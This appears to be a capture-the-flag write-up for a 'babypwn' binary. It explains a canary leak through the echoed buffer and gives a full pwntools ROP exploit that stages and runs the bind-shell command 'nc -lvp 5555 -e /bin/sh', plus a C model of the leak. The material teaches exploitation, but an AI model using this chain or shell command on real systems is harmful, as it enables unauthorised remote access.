Looking at the menu handler, the input read into the 40-byte buffer is not bounded, so the overflow is visible right away. The stack is protected by a canary, but the canary's lowest byte is 0x00 (the glibc convention, so string functions stop at it): filling the buffer with 40 bytes and letting the trailing newline overwrite that null byte makes the echo run into the canary and leak its remaining three bytes. Prepending the known 0x00 gives the full value.
Looking next to it in IDA, the binary calls system() outright, so there is no need for a libc leak: the system PLT entry can be used directly. The chain first calls recv(4, bss, len(cmd), 0) to stage the command into .bss (fd 4 being the client socket), then system(bss).
[exploit]
```python
from pwn import *

p = remote('localhost', 8181)
e = ELF('./babypwn')

ppppr = 0x8048eec                        # pop; pop; pop; pop; ret gadget
cmd = b'nc -lvp 5555 -e /bin/sh\x00'

# 1. Leak the canary: fill the 40-byte buffer, and let the '\n' that
#    sendline() appends overwrite the canary's null low byte so the echo
#    runs on into the canary.
p.sendlineafter(b'> ', b'1')
p.sendlineafter(b': ', b'A' * 40)
leak = p.recv(1024)
canary = u32(b'\x00' + leak[-3:])        # low byte is known to be 0x00
log.info('canary : ' + hex(canary))

# 2. Overflow again with the canary intact, then ROP:
#    recv(4, bss, len(cmd), 0) stages the command, system(bss) runs it.
payload = b'A' * 40
payload += p32(canary)
payload += b'A' * 12                     # padding up to the return address
payload += p32(e.plt['recv'])
payload += p32(ppppr)                    # pops the four recv() arguments
payload += p32(4)                        # client socket fd
payload += p32(e.bss())
payload += p32(len(cmd))
payload += p32(0)
payload += p32(e.plt['system'])
payload += b'AAAA'                       # fake return address for system()
payload += p32(e.bss())

p.sendlineafter(b'> ', b'1')
p.sendlineafter(b': ', payload)
p.sendlineafter(b'> ', b'3')             # return into the ROP chain
p.sendline(cmd)                          # consumed by the staged recv()
log.info('nc localhost 5555')
```
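The canary leak above depends on two details that are easy to get wrong: the canary's low byte is 0x00, and the newline appended by sendline() is what overwrites it. The following C model, added here as an example and not code from the original writeup, reproduces both steps against a simulated frame (a 40-byte buffer directly followed by a 4-byte canary; the layout, the canary value and the echo behaviour are assumptions for illustration). leak_canary() shows that sending exactly 40 bytes leaks nothing, while 40 bytes plus '\n' exposes the three high bytes; overflow_passes_check() shows that only the recovered value survives the epilogue's comparison.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed frame layout: 40-byte buffer immediately followed by the canary,
 * stored little-endian with its lowest byte 0x00. */
#define BUF_SIZE   40
#define CANARY_OFF BUF_SIZE
#define FRAME_SIZE (BUF_SIZE + 4)

static void put_le32(unsigned char *p, uint32_t v) {
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff;
    p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

static uint32_t get_le32(const unsigned char *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* The vulnerable read: copies n bytes into the 40-byte buffer, no bound. */
static void vuln_recv(unsigned char *frame, const unsigned char *in, size_t n) {
    memcpy(frame, in, n);
}

/* The echo: sends the buffer back with strlen-style copying that stops at
 * the first NUL (or at the end of the modelled frame). Returns bytes echoed. */
static size_t echo(const unsigned char *frame, unsigned char *out) {
    size_t n = 0;
    while (n < FRAME_SIZE && frame[n] != '\0') { out[n] = frame[n]; n++; }
    return n;
}

/* Rebuild the canary the way the exploit does: the last three echoed bytes
 * are the canary's high bytes, and the low byte is known to be 0x00. */
static uint32_t recover_canary(const unsigned char *leak, size_t n) {
    return (uint32_t)leak[n - 3] << 8 | (uint32_t)leak[n - 2] << 16 |
           (uint32_t)leak[n - 1] << 24;
}

/* Step 1: send 40 'A'. With append_newline set the input is what sendline()
 * sends, and the '\n' lands on the canary's NUL byte so echo() runs past it.
 * Returns the value the attacker would reconstruct from the echo. */
uint32_t leak_canary(uint32_t real_canary, int append_newline) {
    unsigned char frame[FRAME_SIZE], in[BUF_SIZE + 1], out[FRAME_SIZE];
    memset(frame, 0, sizeof frame);
    put_le32(frame + CANARY_OFF, real_canary);
    memset(in, 'A', BUF_SIZE);
    in[BUF_SIZE] = '\n';
    vuln_recv(frame, in, append_newline ? BUF_SIZE + 1 : BUF_SIZE);
    size_t n = echo(frame, out);
    return recover_canary(out, n);
}

/* Step 2: overflow again with 'A'*40 + p32(guessed_canary). Returns 1 if the
 * epilogue's canary comparison would pass, 0 if __stack_chk_fail would fire. */
int overflow_passes_check(uint32_t real_canary, uint32_t guessed_canary) {
    unsigned char frame[FRAME_SIZE], payload[FRAME_SIZE];
    memset(frame, 0, sizeof frame);
    put_le32(frame + CANARY_OFF, real_canary);
    memset(payload, 'A', BUF_SIZE);
    put_le32(payload + CANARY_OFF, guessed_canary);
    vuln_recv(frame, payload, sizeof payload);
    return get_le32(frame + CANARY_OFF) == real_canary;
}

int main(void) {
    uint32_t real = 0xdeadbe00u;  /* constructed canary, low byte 0x00 */
    uint32_t no_nl = leak_canary(real, 0), with_nl = leak_canary(real, 1);
    printf("without newline: %#x (check %d)\n", no_nl,
           overflow_passes_check(real, no_nl));
    printf("with newline:    %#x (check %d)\n", with_nl,
           overflow_passes_check(real, with_nl));
    return 0;
}
```

Without the newline the echo stops at the canary's null byte and the "leak" is just the tail of the A's; with it, the three bytes after the newline are exactly what u32(b'\x00' + leak[-3:]) reassembles. If the real canary happened to contain another 0x00 in its high bytes the echo would stop early and the offset arithmetic would have to account for it, which is why the exploit takes the last three bytes rather than a fixed offset.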